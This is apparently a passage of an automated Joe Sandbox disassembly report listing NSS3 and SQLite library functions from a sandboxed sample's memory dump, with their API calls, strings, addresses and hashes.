unable to close due to unfinalized statements or unfinished backups, xrefs: 6CA65E64
invalid, xrefs: 6CA65EBE
API call with %s database connection pointer, xrefs: 6CA65EC3
%s at line %d of [%.10s], xrefs: 6CA65EE0

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 632333372-1982981357
Opcode ID: e461dec0c54f6a8391c5efeb8fb1a01a954427257da8303c7964ca77cb4f81d5
Instruction ID: c4b158282ccdbdb120840134530e520ba08edf34c41898281af160cdc7c3afb7
Opcode Fuzzy Hash: e461dec0c54f6a8391c5efeb8fb1a01a954427257da8303c7964ca77cb4f81d5
Instruction Fuzzy Hash: 1481AD30B05652DBEB19CF66C858BAA77B0BF41308F284269D8555BF92D730E886CB91

Function 6CA4DCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA4DDF9
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA4DE68
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA4DE97
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CA4DEB6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA4DF78

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA4DE52, 6CA4DE81
%s at line %d of [%.10s], xrefs: 6CA4DE61, 6CA4DE90
database corruption, xrefs: 6CA4DE5C, 6CA4DE8B

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1526119172-598938438
Opcode ID: d1b98419f3ce1ff2c3601658a018c0c9661a058d0c89e634bfea8aaa1c8370a2
Instruction ID: c88261dd8a26398af436ae6ef1a8cb8a79d3f1bd5281fb9153b546bb43bfd6e4
Opcode Fuzzy Hash: d1b98419f3ce1ff2c3601658a018c0c9661a058d0c89e634bfea8aaa1c8370a2
Instruction Fuzzy Hash: BC81B171B053409FD714CF65C880B6A77F1AF45318F18C86DE99A8BB91EB31E885CB52

Function 6C9FCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C9FB999), ref: 6C9FCFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C9FB999), ref: 6C9FD02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C9FB999), ref: 6C9FD041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C9FB999), ref: 6CB4972B

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9FCFDD, 6C9FD00E, 6C9FD022, 6C9FD033, 6CB49780
%s at line %d of [%.10s], xrefs: 6C9FCFEC, 6C9FD018, 6C9FD029, 6C9FD03F, 6CB4978B
database corruption, xrefs: 6C9FCFE7, 6C9FD013, 6C9FD028, 6C9FD039, 6C9FD03E, 6CB49786

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 77aae8308c6a7fd978389d104295200ee7e1ea8e8f50e29043b1e122307062cd
Instruction ID: c3b78327a5ee1f17dffd9f1f8022199d02f08e129d04c834711891686170030f
Opcode Fuzzy Hash: 77aae8308c6a7fd978389d104295200ee7e1ea8e8f50e29043b1e122307062cd
Instruction Fuzzy Hash: 7E615A71A042508BD310CF69C840BA6B7F5EF55318F2881ADE498AFB42D376E947C7E1

Function 6CAFEF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6CB1A4A1,?,00000000,?,00000001), ref: 6CAFEF6D

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

htonl.WSOCK32(00000000,?,6CB1A4A1,?,00000000,?,00000001), ref: 6CAFEFE4
htonl.WSOCK32(?,00000000,?,6CB1A4A1,?,00000000,?,00000001), ref: 6CAFEFF1
memcpy.VCRUNTIME140(?,?,6CB1A4A1,?,00000000,?,6CB1A4A1,?,00000000,?,00000001), ref: 6CAFF00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6CB1A4A1,?,00000000,?,00000001), ref: 6CAFF027

Strings

dtls13, xrefs: 6CAFEF33

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: a2ddc0095bc0c69ac8fa993e5f2a1877f2119eb47ba7eacbe90072a296f5d4d0
Instruction ID: f09f379d64c8dca5566d567fd19e7d93e6b5b4f10fad8e39c7d6fcf4e1159c0a
Opcode Fuzzy Hash: a2ddc0095bc0c69ac8fa993e5f2a1877f2119eb47ba7eacbe90072a296f5d4d0
Instruction Fuzzy Hash: 7D31E171A01211AFDB10DF28DC80B8AB7E4AF49348F198029F9289B751E731E956CBE1

Function 6CA7AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CA7AFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CB99500,6CA73F91), ref: 6CA7AFD2

Part of subcall function 6CACB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBA18D0,?), ref: 6CACB095

DER_GetInteger_Util.NSS3(?), ref: 6CA7B007

Part of subcall function 6CAC6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6CA71666,?,6CA7B00C,?), ref: 6CAC6AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6CA7B02F
PR_CallOnce.NSS3(6CBD2AA4,6CAD12D0), ref: 6CA7B046
PL_FreeArenaPool.NSS3 ref: 6CA7B058
PL_FinishArenaPool.NSS3 ref: 6CA7B060

Strings

security, xrefs: 6CA7AFB8

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: 9ff759f85a048e9273a76ca985a6a0a994633fff84e9e689d7d8a045c6441e8a
Instruction ID: 0be23e2142b900449e712a77056100d3a01fd5a7b0c37aa96680b6efb22f0b61
Opcode Fuzzy Hash: 9ff759f85a048e9273a76ca985a6a0a994633fff84e9e689d7d8a045c6441e8a
Instruction Fuzzy Hash: 06312CB45043409BD7208F14EC49BAA77A4BF4632CF140719F9759BBD1E332958AC7A7

Function 6CA73E60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 6CA740D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CA73F7F,?,00000055,?,?,6CA71666,?,?), ref: 6CA740D9
Part of subcall function 6CA740D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CA71666,?,?), ref: 6CA740FC
Part of subcall function 6CA740D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CA71666,?,?), ref: 6CA74138

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA73EC2
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CA73ED6

Part of subcall function 6CACB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBA18D0,?), ref: 6CACB095

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA73EEE

Part of subcall function 6CACFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAC8D2D,?,00000000,?), ref: 6CACFB85
Part of subcall function 6CACFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CACFBB1

PR_CallOnce.NSS3(6CBD2AA4,6CAD12D0), ref: 6CA73F02
PL_FreeArenaPool.NSS3 ref: 6CA73F14
PL_FinishArenaPool.NSS3 ref: 6CA73F1C

Part of subcall function 6CAD64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CAD127C,00000000,00000000,00000000), ref: 6CAD650E

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA73F27

Strings

security, xrefs: 6CA73EBC

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$ArenaItem_$Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_Zfreefreememcpy
String ID: security
API String ID: 1076417423-3315324353
Opcode ID: 43acd2d713bd4ca73d9d2c867315b9d1b7f375e64310007318bdc4a21dfd70ea
Instruction ID: f27a30d33623a0478b45d07a824d49f1d0dc92266284faaf8daffa802ae25709
Opcode Fuzzy Hash: 43acd2d713bd4ca73d9d2c867315b9d1b7f375e64310007318bdc4a21dfd70ea
Instruction Fuzzy Hash: C4213AB5904340ABD3148B14AC01FAB73B8FB4835CF05093DF989A7741E731E61887AA

Function 6CABCC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6CABCD08
PK11_DoesMechanism.NSS3(?,?), ref: 6CABCE16
PR_SetError.NSS3(00000000,00000000), ref: 6CABD079

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 9242b57807fd53b32682d701951c1652351989f410cfb94f29ec3cbed7f73289
Instruction ID: 86f9ed00cf2d414b81b4370d4b936b90138cecef6cff5bfb8738c87c31026bc2
Opcode Fuzzy Hash: 9242b57807fd53b32682d701951c1652351989f410cfb94f29ec3cbed7f73289
Instruction Fuzzy Hash: 8BC160B5E002199BDB10DF24CC80BDAB7B8BB48318F1441A9E949A7741E775EED9CF90

Function 6CAADC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6CAB97C1,?,00000000,00000000,?,?,?,00000000,?,6CA97F4A,00000000), ref: 6CAADC68

Part of subcall function 6CAD0BE0: malloc.MOZGLUE(6CAC8D2D,?,00000000,?), ref: 6CAD0BF8
Part of subcall function 6CAD0BE0: TlsGetValue.KERNEL32(6CAC8D2D,?,00000000,?), ref: 6CAD0C15

PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6CA97F4A,00000000,?,00000000,00000000), ref: 6CAADD36
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CA97F4A,00000000,?,00000000,00000000), ref: 6CAADE2D
memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6CA97F4A,00000000,?,00000000,00000000), ref: 6CAADE43
PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6CA97F4A,00000000,?,00000000,00000000), ref: 6CAADE76
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CA97F4A,00000000,?,00000000,00000000), ref: 6CAADF32
memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6CA97F4A,00000000,?,00000000,00000000), ref: 6CAADF5F
PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6CA97F4A,00000000,?,00000000,00000000), ref: 6CAADF78
PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6CA97F4A,00000000,?,00000000,00000000), ref: 6CAADFAA

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Alloc_Util$memcpy$Valuemalloc
String ID:
API String ID: 1886645929-0
Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction ID: 0e9b7acf83fa438bf8f41ccff54174d8aa7949b9e78c7a7bb52ad8b9c5d64ce7
Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction Fuzzy Hash: EE81A774E066004BFF244A99C89035A76B2DB64748F28883ADDDACBFD1E774D4C6C602

Function 6CA83C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_GetCertFromPrivateKey.NSS3(?), ref: 6CA83C76
CERT_DestroyCertificate.NSS3(00000000), ref: 6CA83C94

Part of subcall function 6CA795B0: TlsGetValue.KERNEL32(00000000,?,6CA900D2,00000000), ref: 6CA795D2
Part of subcall function 6CA795B0: EnterCriticalSection.KERNEL32(?,?,?,6CA900D2,00000000), ref: 6CA795E7
Part of subcall function 6CA795B0: PR_Unlock.NSS3(?,?,?,?,6CA900D2,00000000), ref: 6CA79605

PORT_NewArena_Util.NSS3(00000800), ref: 6CA83CB2
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6CA83CCA
memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6CA83CE1

Part of subcall function 6CA83090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CA9AE42), ref: 6CA830AA
Part of subcall function 6CA83090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CA830C7
Part of subcall function 6CA83090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CA830E5
Part of subcall function 6CA83090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA83116
Part of subcall function 6CA83090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA8312B
Part of subcall function 6CA83090: PK11_DestroyObject.NSS3(?,?), ref: 6CA83154
Part of subcall function 6CA83090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA8317E

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
String ID:
API String ID: 3167935723-0
Opcode ID: 53bfe76c15ce4c1edc5874caaa39dcbe2c7bdd049aa5d29b2e2fec2333446986
Instruction ID: 8df6ca7b43abf627bab29a44c03d50560fcbb58ef536e02d9802e10e38ba7327
Opcode Fuzzy Hash: 53bfe76c15ce4c1edc5874caaa39dcbe2c7bdd049aa5d29b2e2fec2333446986
Instruction Fuzzy Hash: EE61C875A02200ABEF105E65DD41FBB76B9EF04748F084428FE49AAA52F731D998C7B1

Function 6CAC3D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 6CAC3440: PK11_GetAllTokens.NSS3 ref: 6CAC3481
Part of subcall function 6CAC3440: PR_SetError.NSS3(00000000,00000000), ref: 6CAC34A3
Part of subcall function 6CAC3440: TlsGetValue.KERNEL32 ref: 6CAC352E
Part of subcall function 6CAC3440: EnterCriticalSection.KERNEL32(?), ref: 6CAC3542
Part of subcall function 6CAC3440: PR_Unlock.NSS3(?), ref: 6CAC355B

TlsGetValue.KERNEL32 ref: 6CAC3D8B
EnterCriticalSection.KERNEL32(?), ref: 6CAC3D9F
PR_Unlock.NSS3(?), ref: 6CAC3DCA
PR_SetError.NSS3(00000000,00000000), ref: 6CAC3DE2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CAC3E4F

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

TlsGetValue.KERNEL32 ref: 6CAC3E97
EnterCriticalSection.KERNEL32(?), ref: 6CAC3EAB
PR_Unlock.NSS3(?), ref: 6CAC3ED6
PR_SetError.NSS3(00000000,00000000), ref: 6CAC3EEE

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
String ID:
API String ID: 2554137219-0
Opcode ID: 3aa1bdd9905a7cf56f3c9cc2debe43e8ef2e15b9d6bff7359ee0338b38112fd2
Instruction ID: c062767d7000b515e10f9487f2ee7e7469225841eb52adf07364fecb37ddf975
Opcode Fuzzy Hash: 3aa1bdd9905a7cf56f3c9cc2debe43e8ef2e15b9d6bff7359ee0338b38112fd2
Instruction Fuzzy Hash: 78511575B026009FEB01AF69DC44BAA73F4EF45318F094528DE495BA12EB31E9D4CBD2

Function 6CA72C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(D3B61396), ref: 6CA72C5D

Part of subcall function 6CAD0D30: calloc.MOZGLUE ref: 6CAD0D50
Part of subcall function 6CAD0D30: TlsGetValue.KERNEL32 ref: 6CAD0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CA72C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA72CE0

Part of subcall function 6CA72E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CA72CDA,?,00000000), ref: 6CA72E1E
Part of subcall function 6CA72E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CA72E33
Part of subcall function 6CA72E00: TlsGetValue.KERNEL32 ref: 6CA72E4E
Part of subcall function 6CA72E00: EnterCriticalSection.KERNEL32(?), ref: 6CA72E5E
Part of subcall function 6CA72E00: PL_HashTableLookup.NSS3(?), ref: 6CA72E71
Part of subcall function 6CA72E00: PL_HashTableRemove.NSS3(?), ref: 6CA72E84
Part of subcall function 6CA72E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CA72E96
Part of subcall function 6CA72E00: PR_Unlock.NSS3 ref: 6CA72EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA72D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6CA72D30
CERT_MakeCANickname.NSS3(00000001), ref: 6CA72D3F
free.MOZGLUE(00000000), ref: 6CA72D73
CERT_DestroyCertificate.NSS3(?), ref: 6CA72DB8
free.MOZGLUE ref: 6CA72DC8

Part of subcall function 6CA73E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA73EC2
Part of subcall function 6CA73E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CA73ED6
Part of subcall function 6CA73E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA73EEE
Part of subcall function 6CA73E60: PR_CallOnce.NSS3(6CBD2AA4,6CAD12D0), ref: 6CA73F02
Part of subcall function 6CA73E60: PL_FreeArenaPool.NSS3 ref: 6CA73F14
Part of subcall function 6CA73E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA73F27

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: fbe707c390461fa8e8750e2a9fc3718f720491689e6a7df7c48b534c1d326fc5
